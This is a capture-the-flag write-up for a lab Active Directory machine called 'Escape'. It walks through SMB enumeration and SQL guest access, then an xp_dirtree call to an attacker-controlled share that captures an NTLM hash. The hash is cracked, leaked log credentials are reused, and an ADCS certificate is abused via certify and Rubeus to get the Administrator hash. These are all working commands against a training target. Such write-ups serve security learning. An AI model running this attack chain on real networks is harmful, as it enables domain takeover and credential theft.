Escape

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 5000 -Pn 10.129.242.117
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 06:51 EST
Nmap scan report for 10.129.242.117
Host is up (0.0078s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49689/tcp open  unknown
49690/tcp open  unknown
49710/tcp open  unknown
49714/tcp open  unknown

Looks like an AD machine to me. Interestingly, they made port 1433 public facing.

SMB Enum

We can find one share available through smbmap:

$ smbmap -u 'guest' -p '' -H 10.129.242.117
[+] IP: 10.129.242.117:445      Name: 10.129.242.117                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Public                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share

Before checking this share out, we can enumerate the possible usernames and groups using enum4linux with the same credentials. We find the the domain name is called sequel.

S-1-5-21-4078382237-1492182817-2568127209-500 sequel\Administrator (Local User)              
S-1-5-21-4078382237-1492182817-2568127209-501 sequel\Guest (Local User)
S-1-5-21-4078382237-1492182817-2568127209-502 sequel\krbtgt (Local User)
S-1-5-21-4078382237-1492182817-2568127209-512 sequel\Domain Admins (Domain Group)
...

Checking the share out, we can find that there's one file here:

$ smbclient //10.129.242.117/Public -U 'guest'
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

We can download this file and view it.

SQL Server Procedures

This is the file contents:

The next page contains a guest login for the SQL server. We also find a user called brandon.brown, who is likely some kind of database administrator.

We can use mssqlclient.py to connect and interact with this database:

$ impacket-mssqlclient WORKGROUP/PublicUser:GuestUserCantWrite1@10.129.242.117
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL>

I was able to confirm that xp_dirtree is working on this SQL database, thus allowing us to capture hashes either via smbserver.py or responder.

Just run this within the database:

EXEC xp_dirtree '\\10.10.14.7\share'

Afterwards, we would capture an NTLM hash.

We can try to crack this hash via whatever method available to find this password:

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc)

With these credentials, I was able to login via evil-winrm.

Privilege Escalation

SQL Logs

This user did not have the flag or any other local privileges. However, since we are an SQL user, we can perhaps read some sensitive SQL files.

Within the C:\SQLServer\Logs file, we can find an ERRORLOG file:

Within that file, we can find some credentials:

2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

With these credentials, we can login as ryan.cooper.

We can grab the user flag now.

Certify.exe -> Admin NTLM

I ran a winPEAS scan to enumerate for me. This scan found some certificates on the machine that could potentially be the PE vector.

We can use certify.exe to find out if this is vulnerable. Using certify.exe find /vulnerable, we can find one certificate:

We can then request for this certificate using this command:

.\certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

This would output an RSA key and a certificate:

Afterwards, we can simply use openssl to convert this output into a .pfx file:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Then, transfer the pfx file and rubeus.exe to the machine. We can use asktgt with the certificate.

Now that we have confirmed this works, we can append /getcredentials to the end of the Rubeus command.

Then, just pass the hash!